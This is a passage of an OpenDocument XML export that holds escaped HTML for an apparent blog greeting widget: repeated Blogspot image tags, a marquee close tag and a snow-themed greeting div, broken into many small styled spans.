      <text:p text:style-name="P1"><text:span text:style-name="T2880">&lt;img src="https://</text:span><text:span text:style-name="T2881">1</text:span><text:span text:style-name="T2882">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2883">79</text:span><text:span text:style-name="T2884">F</text:span><text:span text:style-name="T2885">0</text:span><text:span text:style-name="T2886">H</text:span><text:span text:style-name="T2887">9</text:span><text:span text:style-name="T2888">ZsPg/W</text:span><text:span text:style-name="T2889">1</text:span><text:span text:style-name="T2890">R</text:span><text:span text:style-name="T2891">1</text:span><text:span text:style-name="T2892">ufZS-</text:span><text:span text:style-name="T2893">2</text:span><text:span text:style-name="T2894">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2895">6</text:span><text:span text:style-name="T2896">CMrX</text:span><text:span text:style-name="T2897">784</text:span><text:span text:style-name="T2898">WTsVl</text:span><text:span text:style-name="T2899">7</text:span><text:span text:style-name="T2900">L</text:span><text:span text:style-name="T2901">2</text:span><text:span text:style-name="T2902">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2903">1600</text:span><text:span text:style-name="T2904">/b.png" height="</text:span><text:span text:style-name="T2905">129</text:span><text:span text:style-name="T2906">px" width="</text:span><text:span text:style-name="T2907">35</text:span><text:span text:style-name="T2908">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2909"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2910">&lt;img src="https://</text:span><text:span text:style-name="T2911">4</text:span><text:span text:style-name="T2912">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2913">1</text:span><text:span text:style-name="T2914">R</text:span><text:span text:style-name="T2915">1</text:span><text:span text:style-name="T2916">uj</text:span><text:span text:style-name="T2917">9</text:span><text:span text:style-name="T2918">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2919">5</text:span><text:span text:style-name="T2920">kQfyUps</text:span><text:span text:style-name="T2921">6</text:span><text:span text:style-name="T2922">VGgerj</text:span><text:span text:style-name="T2923">8</text:span><text:span text:style-name="T2924">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2925">1600</text:span><text:span text:style-name="T2926">/a.png" height="</text:span><text:span text:style-name="T2927">129</text:span><text:span text:style-name="T2928">px" width="</text:span><text:span text:style-name="T2929">35</text:span><text:span text:style-name="T2930">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2931"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2932">&lt;img src="https://</text:span><text:span text:style-name="T2933">1</text:span><text:span text:style-name="T2934">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2935">79</text:span><text:span text:style-name="T2936">F</text:span><text:span text:style-name="T2937">0</text:span><text:span text:style-name="T2938">H</text:span><text:span text:style-name="T2939">9</text:span><text:span text:style-name="T2940">ZsPg/W</text:span><text:span text:style-name="T2941">1</text:span><text:span text:style-name="T2942">R</text:span><text:span text:style-name="T2943">1</text:span><text:span text:style-name="T2944">ufZS-</text:span><text:span text:style-name="T2945">2</text:span><text:span text:style-name="T2946">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2947">6</text:span><text:span text:style-name="T2948">CMrX</text:span><text:span text:style-name="T2949">784</text:span><text:span text:style-name="T2950">WTsVl</text:span><text:span text:style-name="T2951">7</text:span><text:span text:style-name="T2952">L</text:span><text:span text:style-name="T2953">2</text:span><text:span text:style-name="T2954">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2955">1600</text:span><text:span text:style-name="T2956">/b.png" height="</text:span><text:span text:style-name="T2957">129</text:span><text:span text:style-name="T2958">px" width="</text:span><text:span text:style-name="T2959">35</text:span><text:span text:style-name="T2960">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2961"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2962">&lt;img src="https://</text:span><text:span text:style-name="T2963">4</text:span><text:span text:style-name="T2964">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2965">1</text:span><text:span text:style-name="T2966">R</text:span><text:span text:style-name="T2967">1</text:span><text:span text:style-name="T2968">uj</text:span><text:span text:style-name="T2969">9</text:span><text:span text:style-name="T2970">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2971">5</text:span><text:span text:style-name="T2972">kQfyUps</text:span><text:span text:style-name="T2973">6</text:span><text:span text:style-name="T2974">VGgerj</text:span><text:span text:style-name="T2975">8</text:span><text:span text:style-name="T2976">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2977">1600</text:span><text:span text:style-name="T2978">/a.png" height="</text:span><text:span text:style-name="T2979">129</text:span><text:span text:style-name="T2980">px" width="</text:span><text:span text:style-name="T2981">35</text:span><text:span text:style-name="T2982">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2983"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2984">&lt;img src="https://</text:span><text:span text:style-name="T2985">1</text:span><text:span text:style-name="T2986">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2987">79</text:span><text:span text:style-name="T2988">F</text:span><text:span text:style-name="T2989">0</text:span><text:span text:style-name="T2990">H</text:span><text:span text:style-name="T2991">9</text:span><text:span text:style-name="T2992">ZsPg/W</text:span><text:span text:style-name="T2993">1</text:span><text:span text:style-name="T2994">R</text:span><text:span text:style-name="T2995">1</text:span><text:span text:style-name="T2996">ufZS-</text:span><text:span text:style-name="T2997">2</text:span><text:span text:style-name="T2998">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2999">6</text:span><text:span text:style-name="T3000">CMrX</text:span><text:span text:style-name="T3001">784</text:span><text:span text:style-name="T3002">WTsVl</text:span><text:span text:style-name="T3003">7</text:span><text:span text:style-name="T3004">L</text:span><text:span text:style-name="T3005">2</text:span><text:span text:style-name="T3006">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3007">1600</text:span><text:span text:style-name="T3008">/b.png" height="</text:span><text:span text:style-name="T3009">129</text:span><text:span text:style-name="T3010">px" width="</text:span><text:span text:style-name="T3011">35</text:span><text:span text:style-name="T3012">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3013"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3014">&lt;img src="https://</text:span><text:span text:style-name="T3015">4</text:span><text:span text:style-name="T3016">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3017">1</text:span><text:span text:style-name="T3018">R</text:span><text:span text:style-name="T3019">1</text:span><text:span text:style-name="T3020">uj</text:span><text:span text:style-name="T3021">9</text:span><text:span text:style-name="T3022">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3023">5</text:span><text:span text:style-name="T3024">kQfyUps</text:span><text:span text:style-name="T3025">6</text:span><text:span text:style-name="T3026">VGgerj</text:span><text:span text:style-name="T3027">8</text:span><text:span text:style-name="T3028">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3029">1600</text:span><text:span text:style-name="T3030">/a.png" height="</text:span><text:span text:style-name="T3031">129</text:span><text:span text:style-name="T3032">px" width="</text:span><text:span text:style-name="T3033">35</text:span><text:span text:style-name="T3034">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3035"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3036">&lt;img src="https://</text:span><text:span text:style-name="T3037">1</text:span><text:span text:style-name="T3038">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3039">79</text:span><text:span text:style-name="T3040">F</text:span><text:span text:style-name="T3041">0</text:span><text:span text:style-name="T3042">H</text:span><text:span text:style-name="T3043">9</text:span><text:span text:style-name="T3044">ZsPg/W</text:span><text:span text:style-name="T3045">1</text:span><text:span text:style-name="T3046">R</text:span><text:span text:style-name="T3047">1</text:span><text:span text:style-name="T3048">ufZS-</text:span><text:span text:style-name="T3049">2</text:span><text:span text:style-name="T3050">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3051">6</text:span><text:span text:style-name="T3052">CMrX</text:span><text:span text:style-name="T3053">784</text:span><text:span text:style-name="T3054">WTsVl</text:span><text:span text:style-name="T3055">7</text:span><text:span text:style-name="T3056">L</text:span><text:span text:style-name="T3057">2</text:span><text:span text:style-name="T3058">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3059">1600</text:span><text:span text:style-name="T3060">/b.png" height="</text:span><text:span text:style-name="T3061">129</text:span><text:span text:style-name="T3062">px" width="</text:span><text:span text:style-name="T3063">35</text:span><text:span text:style-name="T3064">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3065"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3066">&lt;img src="https://</text:span><text:span text:style-name="T3067">4</text:span><text:span text:style-name="T3068">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3069">1</text:span><text:span text:style-name="T3070">R</text:span><text:span text:style-name="T3071">1</text:span><text:span text:style-name="T3072">uj</text:span><text:span text:style-name="T3073">9</text:span><text:span text:style-name="T3074">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3075">5</text:span><text:span text:style-name="T3076">kQfyUps</text:span><text:span text:style-name="T3077">6</text:span><text:span text:style-name="T3078">VGgerj</text:span><text:span text:style-name="T3079">8</text:span><text:span text:style-name="T3080">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3081">1600</text:span><text:span text:style-name="T3082">/a.png" height="</text:span><text:span text:style-name="T3083">129</text:span><text:span text:style-name="T3084">px" width="</text:span><text:span text:style-name="T3085">35</text:span><text:span text:style-name="T3086">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3087"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3088">&lt;img src="https://</text:span><text:span text:style-name="T3089">1</text:span><text:span text:style-name="T3090">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3091">79</text:span><text:span text:style-name="T3092">F</text:span><text:span text:style-name="T3093">0</text:span><text:span text:style-name="T3094">H</text:span><text:span text:style-name="T3095">9</text:span><text:span text:style-name="T3096">ZsPg/W</text:span><text:span text:style-name="T3097">1</text:span><text:span text:style-name="T3098">R</text:span><text:span text:style-name="T3099">1</text:span><text:span text:style-name="T3100">ufZS-</text:span><text:span text:style-name="T3101">2</text:span><text:span text:style-name="T3102">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3103">6</text:span><text:span text:style-name="T3104">CMrX</text:span><text:span text:style-name="T3105">784</text:span><text:span text:style-name="T3106">WTsVl</text:span><text:span text:style-name="T3107">7</text:span><text:span text:style-name="T3108">L</text:span><text:span text:style-name="T3109">2</text:span><text:span text:style-name="T3110">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3111">1600</text:span><text:span text:style-name="T3112">/b.png" height="</text:span><text:span text:style-name="T3113">129</text:span><text:span text:style-name="T3114">px" width="</text:span><text:span text:style-name="T3115">35</text:span><text:span text:style-name="T3116">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3117"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3118">&lt;img src="https://</text:span><text:span text:style-name="T3119">4</text:span><text:span text:style-name="T3120">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3121">1</text:span><text:span text:style-name="T3122">R</text:span><text:span text:style-name="T3123">1</text:span><text:span text:style-name="T3124">uj</text:span><text:span text:style-name="T3125">9</text:span><text:span text:style-name="T3126">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3127">5</text:span><text:span text:style-name="T3128">kQfyUps</text:span><text:span text:style-name="T3129">6</text:span><text:span text:style-name="T3130">VGgerj</text:span><text:span text:style-name="T3131">8</text:span><text:span text:style-name="T3132">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3133">1600</text:span><text:span text:style-name="T3134">/a.png" height="</text:span><text:span text:style-name="T3135">129</text:span><text:span text:style-name="T3136">px" width="</text:span><text:span text:style-name="T3137">35</text:span><text:span text:style-name="T3138">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3139"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3140">&lt;img src="https://</text:span><text:span text:style-name="T3141">1</text:span><text:span text:style-name="T3142">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3143">79</text:span><text:span text:style-name="T3144">F</text:span><text:span text:style-name="T3145">0</text:span><text:span text:style-name="T3146">H</text:span><text:span text:style-name="T3147">9</text:span><text:span text:style-name="T3148">ZsPg/W</text:span><text:span text:style-name="T3149">1</text:span><text:span text:style-name="T3150">R</text:span><text:span text:style-name="T3151">1</text:span><text:span text:style-name="T3152">ufZS-</text:span><text:span text:style-name="T3153">2</text:span><text:span text:style-name="T3154">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3155">6</text:span><text:span text:style-name="T3156">CMrX</text:span><text:span text:style-name="T3157">784</text:span><text:span text:style-name="T3158">WTsVl</text:span><text:span text:style-name="T3159">7</text:span><text:span text:style-name="T3160">L</text:span><text:span text:style-name="T3161">2</text:span><text:span text:style-name="T3162">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3163">1600</text:span><text:span text:style-name="T3164">/b.png" height="</text:span><text:span text:style-name="T3165">129</text:span><text:span text:style-name="T3166">px" width="</text:span><text:span text:style-name="T3167">35</text:span><text:span text:style-name="T3168">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3169"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3170">&lt;img src="https://</text:span><text:span text:style-name="T3171">4</text:span><text:span text:style-name="T3172">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3173">1</text:span><text:span text:style-name="T3174">R</text:span><text:span text:style-name="T3175">1</text:span><text:span text:style-name="T3176">uj</text:span><text:span text:style-name="T3177">9</text:span><text:span text:style-name="T3178">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3179">5</text:span><text:span text:style-name="T3180">kQfyUps</text:span><text:span text:style-name="T3181">6</text:span><text:span text:style-name="T3182">VGgerj</text:span><text:span text:style-name="T3183">8</text:span><text:span text:style-name="T3184">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3185">1600</text:span><text:span text:style-name="T3186">/a.png" height="</text:span><text:span text:style-name="T3187">129</text:span><text:span text:style-name="T3188">px" width="</text:span><text:span text:style-name="T3189">35</text:span><text:span text:style-name="T3190">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3191"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3192">&lt;img src="https://</text:span><text:span text:style-name="T3193">1</text:span><text:span text:style-name="T3194">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3195">79</text:span><text:span text:style-name="T3196">F</text:span><text:span text:style-name="T3197">0</text:span><text:span text:style-name="T3198">H</text:span><text:span text:style-name="T3199">9</text:span><text:span text:style-name="T3200">ZsPg/W</text:span><text:span text:style-name="T3201">1</text:span><text:span text:style-name="T3202">R</text:span><text:span text:style-name="T3203">1</text:span><text:span text:style-name="T3204">ufZS-</text:span><text:span text:style-name="T3205">2</text:span><text:span text:style-name="T3206">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3207">6</text:span><text:span text:style-name="T3208">CMrX</text:span><text:span text:style-name="T3209">784</text:span><text:span text:style-name="T3210">WTsVl</text:span><text:span text:style-name="T3211">7</text:span><text:span text:style-name="T3212">L</text:span><text:span text:style-name="T3213">2</text:span><text:span text:style-name="T3214">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3215">1600</text:span><text:span text:style-name="T3216">/b.png" height="</text:span><text:span text:style-name="T3217">129</text:span><text:span text:style-name="T3218">px" width="</text:span><text:span text:style-name="T3219">35</text:span><text:span text:style-name="T3220">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3221"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3222">&lt;img src="https://</text:span><text:span text:style-name="T3223">4</text:span><text:span text:style-name="T3224">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3225">1</text:span><text:span text:style-name="T3226">R</text:span><text:span text:style-name="T3227">1</text:span><text:span text:style-name="T3228">uj</text:span><text:span text:style-name="T3229">9</text:span><text:span text:style-name="T3230">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3231">5</text:span><text:span text:style-name="T3232">kQfyUps</text:span><text:span text:style-name="T3233">6</text:span><text:span text:style-name="T3234">VGgerj</text:span><text:span text:style-name="T3235">8</text:span><text:span text:style-name="T3236">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3237">1600</text:span><text:span text:style-name="T3238">/a.png" height="</text:span><text:span text:style-name="T3239">129</text:span><text:span text:style-name="T3240">px" width="</text:span><text:span text:style-name="T3241">35</text:span><text:span text:style-name="T3242">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3243"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3244">&lt;img src="https://</text:span><text:span text:style-name="T3245">1</text:span><text:span text:style-name="T3246">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3247">79</text:span><text:span text:style-name="T3248">F</text:span><text:span text:style-name="T3249">0</text:span><text:span text:style-name="T3250">H</text:span><text:span text:style-name="T3251">9</text:span><text:span text:style-name="T3252">ZsPg/W</text:span><text:span text:style-name="T3253">1</text:span><text:span text:style-name="T3254">R</text:span><text:span text:style-name="T3255">1</text:span><text:span text:style-name="T3256">ufZS-</text:span><text:span text:style-name="T3257">2</text:span><text:span text:style-name="T3258">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3259">6</text:span><text:span text:style-name="T3260">CMrX</text:span><text:span text:style-name="T3261">784</text:span><text:span text:style-name="T3262">WTsVl</text:span><text:span text:style-name="T3263">7</text:span><text:span text:style-name="T3264">L</text:span><text:span text:style-name="T3265">2</text:span><text:span text:style-name="T3266">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3267">1600</text:span><text:span text:style-name="T3268">/b.png" height="</text:span><text:span text:style-name="T3269">129</text:span><text:span text:style-name="T3270">px" width="</text:span><text:span text:style-name="T3271">35</text:span><text:span text:style-name="T3272">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3273"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3274">&lt;img src="https://</text:span><text:span text:style-name="T3275">4</text:span><text:span text:style-name="T3276">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3277">1</text:span><text:span text:style-name="T3278">R</text:span><text:span text:style-name="T3279">1</text:span><text:span text:style-name="T3280">uj</text:span><text:span text:style-name="T3281">9</text:span><text:span text:style-name="T3282">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3283">5</text:span><text:span text:style-name="T3284">kQfyUps</text:span><text:span text:style-name="T3285">6</text:span><text:span text:style-name="T3286">VGgerj</text:span><text:span text:style-name="T3287">8</text:span><text:span text:style-name="T3288">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3289">1600</text:span><text:span text:style-name="T3290">/a.png" height="</text:span><text:span text:style-name="T3291">129</text:span><text:span text:style-name="T3292">px" width="</text:span><text:span text:style-name="T3293">35</text:span><text:span text:style-name="T3294">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3295"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3296">&lt;img src="https://</text:span><text:span text:style-name="T3297">1</text:span><text:span text:style-name="T3298">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3299">79</text:span><text:span text:style-name="T3300">F</text:span><text:span text:style-name="T3301">0</text:span><text:span text:style-name="T3302">H</text:span><text:span text:style-name="T3303">9</text:span><text:span text:style-name="T3304">ZsPg/W</text:span><text:span text:style-name="T3305">1</text:span><text:span text:style-name="T3306">R</text:span><text:span text:style-name="T3307">1</text:span><text:span text:style-name="T3308">ufZS-</text:span><text:span text:style-name="T3309">2</text:span><text:span text:style-name="T3310">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3311">6</text:span><text:span text:style-name="T3312">CMrX</text:span><text:span text:style-name="T3313">784</text:span><text:span text:style-name="T3314">WTsVl</text:span><text:span text:style-name="T3315">7</text:span><text:span text:style-name="T3316">L</text:span><text:span text:style-name="T3317">2</text:span><text:span text:style-name="T3318">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3319">1600</text:span><text:span text:style-name="T3320">/b.png" height="</text:span><text:span text:style-name="T3321">129</text:span><text:span text:style-name="T3322">px" width="</text:span><text:span text:style-name="T3323">35</text:span><text:span text:style-name="T3324">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3325"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3326">&lt;img src="https://</text:span><text:span text:style-name="T3327">4</text:span><text:span text:style-name="T3328">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3329">1</text:span><text:span text:style-name="T3330">R</text:span><text:span text:style-name="T3331">1</text:span><text:span text:style-name="T3332">uj</text:span><text:span text:style-name="T3333">9</text:span><text:span text:style-name="T3334">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3335">5</text:span><text:span text:style-name="T3336">kQfyUps</text:span><text:span text:style-name="T3337">6</text:span><text:span text:style-name="T3338">VGgerj</text:span><text:span text:style-name="T3339">8</text:span><text:span text:style-name="T3340">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3341">1600</text:span><text:span text:style-name="T3342">/a.png" height="</text:span><text:span text:style-name="T3343">129</text:span><text:span text:style-name="T3344">px" width="</text:span><text:span text:style-name="T3345">35</text:span><text:span text:style-name="T3346">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3347"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3348">&lt;img src="https://</text:span><text:span text:style-name="T3349">1</text:span><text:span text:style-name="T3350">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3351">79</text:span><text:span text:style-name="T3352">F</text:span><text:span text:style-name="T3353">0</text:span><text:span text:style-name="T3354">H</text:span><text:span text:style-name="T3355">9</text:span><text:span text:style-name="T3356">ZsPg/W</text:span><text:span text:style-name="T3357">1</text:span><text:span text:style-name="T3358">R</text:span><text:span text:style-name="T3359">1</text:span><text:span text:style-name="T3360">ufZS-</text:span><text:span text:style-name="T3361">2</text:span><text:span text:style-name="T3362">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3363">6</text:span><text:span text:style-name="T3364">CMrX</text:span><text:span text:style-name="T3365">784</text:span><text:span text:style-name="T3366">WTsVl</text:span><text:span text:style-name="T3367">7</text:span><text:span text:style-name="T3368">L</text:span><text:span text:style-name="T3369">2</text:span><text:span text:style-name="T3370">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3371">1600</text:span><text:span text:style-name="T3372">/b.png" height="</text:span><text:span text:style-name="T3373">129</text:span><text:span text:style-name="T3374">px" width="</text:span><text:span text:style-name="T3375">35</text:span><text:span text:style-name="T3376">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3377"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3378">&lt;img src="https://</text:span><text:span text:style-name="T3379">4</text:span><text:span text:style-name="T3380">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T3381">1</text:span><text:span text:style-name="T3382">R</text:span><text:span text:style-name="T3383">1</text:span><text:span text:style-name="T3384">uj</text:span><text:span text:style-name="T3385">9</text:span><text:span text:style-name="T3386">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T3387">5</text:span><text:span text:style-name="T3388">kQfyUps</text:span><text:span text:style-name="T3389">6</text:span><text:span text:style-name="T3390">VGgerj</text:span><text:span text:style-name="T3391">8</text:span><text:span text:style-name="T3392">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T3393">1600</text:span><text:span text:style-name="T3394">/a.png" height="</text:span><text:span text:style-name="T3395">129</text:span><text:span text:style-name="T3396">px" width="</text:span><text:span text:style-name="T3397">35</text:span><text:span text:style-name="T3398">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3399"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3400">&lt;img src="https://</text:span><text:span text:style-name="T3401">1</text:span><text:span text:style-name="T3402">.bp.blogspot.com/-I</text:span><text:span text:style-name="T3403">79</text:span><text:span text:style-name="T3404">F</text:span><text:span text:style-name="T3405">0</text:span><text:span text:style-name="T3406">H</text:span><text:span text:style-name="T3407">9</text:span><text:span text:style-name="T3408">ZsPg/W</text:span><text:span text:style-name="T3409">1</text:span><text:span text:style-name="T3410">R</text:span><text:span text:style-name="T3411">1</text:span><text:span text:style-name="T3412">ufZS-</text:span><text:span text:style-name="T3413">2</text:span><text:span text:style-name="T3414">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T3415">6</text:span><text:span text:style-name="T3416">CMrX</text:span><text:span text:style-name="T3417">784</text:span><text:span text:style-name="T3418">WTsVl</text:span><text:span text:style-name="T3419">7</text:span><text:span text:style-name="T3420">L</text:span><text:span text:style-name="T3421">2</text:span><text:span text:style-name="T3422">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T3423">1600</text:span><text:span text:style-name="T3424">/b.png" height="</text:span><text:span text:style-name="T3425">129</text:span><text:span text:style-name="T3426">px" width="</text:span><text:span text:style-name="T3427">35</text:span><text:span text:style-name="T3428">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3429"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3430">&lt;/marquee&gt;</text:span><text:span text:style-name="T3431"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3431"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3432"><text:s/>&lt;div class="wbncontainer"&gt;</text:span><text:span text:style-name="T3433"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3433"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3434"><text:s/>&lt;div class="wb-main-greeting"&gt;</text:span><text:span text:style-name="T3435"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3435"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3436">&lt;div style="background: url(https://</text:span><text:span text:style-name="T3437">1</text:span><text:span text:style-name="T3438">.bp.blogspot.com/-l</text:span><text:span text:style-name="T3439">0</text:span><text:span text:style-name="T3440">EVRb</text:span><text:span text:style-name="T3441">2</text:span><text:span text:style-name="T3442">fd</text:span><text:span text:style-name="T3443">3</text:span><text:span text:style-name="T3444">Q/WyNAg</text:span><text:span text:style-name="T3445">2</text:span><text:span text:style-name="T3446">N</text:span><text:span text:style-name="T3447">6</text:span><text:span text:style-name="T3448">m</text:span><text:span text:style-name="T3449">6</text:span><text:span text:style-name="T3450">I/AAAAAAAAAag/yA</text:span><text:span text:style-name="T3451">795</text:span><text:span text:style-name="T3452">u</text:span><text:span text:style-name="T3453">9</text:span><text:span text:style-name="T3454">GRJIf-DaE</text:span><text:span text:style-name="T3455">6</text:span><text:span text:style-name="T3456">-UCcWxL_bbdR</text:span><text:span text:style-name="T3457">5</text:span><text:span text:style-name="T3458">rXwCLcBGAs/s</text:span><text:span text:style-name="T3459">1600</text:span><text:span text:style-name="T3460">/Snow_falling</text:span><text:span text:style-name="T3461">1</text:span><text:span text:style-name="T3462">.gif); background-color:; color: white; font-weight: bold; padding-top:<text:s/></text:span><text:span text:style-name="T3463">0</text:span><text:span text:style-name="T3464">px; padding-bottom:<text:s/></text:span><text:span text:style-name="T3465">0</text:span><text:span text:style-name="T3466">px; font-size:<text:s/></text:span><text:span text:style-name="T3467">12</text:span><text:span text:style-name="T3468">;text-align:center; "&gt;</text:span><text:span text:style-name="T3469"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3470">&lt;font color="white"&gt; &lt;p id="wb"&gt;&lt;/p&gt;</text:span><text:span text:style-name="T3471"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3472">&lt;/font&gt;</text:span><text:span text:style-name="T3473"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3474">&lt;/div&gt;</text:span><text:span text:style-name="T3475"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3476">&lt;div style="background: url(https://</text:span><text:span text:style-name="T3477">1</text:span><text:span text:style-name="T3478">.bp.blogspot.com/-l</text:span><text:span text:style-name="T3479">0</text:span><text:span text:style-name="T3480">EVRb</text:span><text:span text:style-name="T3481">2</text:span><text:span text:style-name="T3482">fd</text:span><text:span text:style-name="T3483">3</text:span><text:span text:style-name="T3484">Q/WyNAg</text:span><text:span text:style-name="T3485">2</text:span><text:span text:style-name="T3486">N</text:span><text:span text:style-name="T3487">6</text:span><text:span text:style-name="T3488">m</text:span><text:span text:style-name="T3489">6</text:span><text:span text:style-name="T3490">I/AAAAAAAAAag/yA</text:span><text:span text:style-name="T3491">795</text:span><text:span text:style-name="T3492">u</text:span><text:span text:style-name="T3493">9</text:span><text:span text:style-name="T3494">GRJIf-DaE</text:span><text:span text:style-name="T3495">6</text:span><text:span text:style-name="T3496">-UCcWxL_bbdR</text:span><text:span text:style-name="T3497">5</text:span><text:span text:style-name="T3498">rXwCLcBGAs/s</text:span><text:span 